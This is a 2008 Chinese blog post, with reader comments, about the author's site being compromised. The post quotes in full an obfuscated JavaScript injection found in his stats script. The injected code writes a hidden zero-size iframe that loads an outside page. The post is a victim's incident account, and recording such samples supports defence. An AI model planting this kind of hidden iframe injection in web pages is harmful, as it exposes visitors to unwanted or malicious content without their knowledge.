被挂马了

dimlau @ ,分类于 网络纪事

我招谁惹谁了?

我的blog里每个页面都加在一个用于统计的JS文件。今天我访问自己blog时McAfee提示发现木马,我检查文件后发现上述JS里被加入了一大坨代码。据说还是用JS混淆器处理过的:

function ads(){var Then = new Date()
Then.setTime(Then.getTime() + 6*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie1="
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){} else {document.cookie = "Cookie1=Filter;expires="+ Then.toGMTString()
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5.6(\'<1 4=0 3=0 2="7://8.d/c/b.9?a">\');',14,14,'|iframe|src|width|height|document|writeln|http|mydeller|htm|feng|add_651435|page|cn'.split('|'),0,{}))
window.status=" ";}}ads();

我把JS保存到本地,用safari打开,用safari的web检查器检查,发现貌似只是一个刷流量的东西,调用了51.la的统计代码还有别的乱七八糟。。。

我也不知道怎么就被挂马了,是服务器被黑了呢还是我自己的原因?总之我已经修改了空间里几乎所有程序的密码,顺便把一些来路不正的源码删掉了。希望可以安全。

顺便。。。safari是个好东西,有了它就不要到处找什么FLV下载器了,在播放在线视频的时候按ctrl+alt+A(或者在菜单里选择窗口-活动)你会发现一个正在不断下载中的文件,双击之就能保存到本地了哦耶。

现有19条评论

Looki
2008-05-19,22:55

可能是同服务或同机房有程序漏洞造成的吧
想当初F2blog有漏洞时,我的整个服务器控制权都被人得到了

唉,这个星期被地震给折腾坏了

dimlau
2008-05-19,23:05

@looki 刚想问候你呢,电视上正在放着关于西安的新闻呢,不过既然你来了应该是没缺胳膊少腿吧

Looki
2008-05-19,23:14

还好还好,就是没睡好觉而已

其实我除了5.12那次感觉到强烈的震外
后面的几次我都没感觉的-_-#
但是因为那些过份敏感的人们,搞得我也紧张了

dimlau
2008-05-19,23:34

@looki 好吧,我认定我捐的钱都用来抚平你受伤的心了,呵呵

PS.好怀念版聊啊。。。

zorro
2008-05-20,00:04

人家很多门户网都灰色了,你怎么也不处理呢?!!

dimlau
2008-05-20,00:38

@zorro 我这里除了蓝色就是灰色了,还处理啥。。。

Jose
2008-05-20,00:45

最后一段学习了~特此感谢!

leavic
2008-05-20,00:49

99%是你自己的電腦中毒了,我也碰過這種病毒,別的反應都沒有,就是時不時的在你訪問網頁的時候插一段代碼進去。

dimlau
2008-05-20,00:58

@leavic 好吧,我承认你给我的网址我看了,除了这个我已经很久没有访问不在我opera speed dial里的网站了。难道一次犯错就中标!我太惨了

wayne
2008-05-20,01:30

把上面的banner也灰掉阿...

dimlau
2008-05-20,02:14

@zorro&wayne 好吧,IE下已经灰了

leavic
2008-05-20,02:59

@dimlau,
我早就把那個網站上的所有站外內容屏蔽了。。。
另外絕大部分的網頁木馬對opera和FF應該都是無效的,如果真是通過這種中毒,那恭喜你碰上小概率事件了。

dimlau
2008-05-20,10:29

我去那里的时候也屏蔽了很多东西。昨天彻底杀了一遍毒,没发现什么异常,应该不是那个的原因
总之目前为止没有再出问题,但愿不会出事了

yacca
2008-05-20,22:45

...服务器被黑了估计

dimlau
2008-05-21,00:20

@yacca 貌似很多和我同空间上的网站也出现速度不稳定等等问题,可能真的被黑了

easylau
2008-05-21,23:41

那这几天上不去也就是这个原因吧o(∩_∩)o...呵呵

dimlau
2008-05-22,00:27

这几天速度一直不稳定,所以打不开页面可能是速度问题。

footprinter
2008-05-25,15:00

人品体现出来了吧?

dimlau
2008-05-25,17:26

@footprinter 你是说我发现及时并且清理迅速,所以人品很好?嘿嘿

Many Thanks

Submit comment

必填
必填

评论须知

  1. 我女儿以后也会来看我的blog,请不要让超过PG-13限制的内容出现在本站;
  2. 请尽量把自己要表达的内容一次性表达清楚,我有强迫症,看不懂的内容会让我抓狂;
  3. 评论内容不支持 HTML,你可以使用 textile 语法来表现一些高级格式。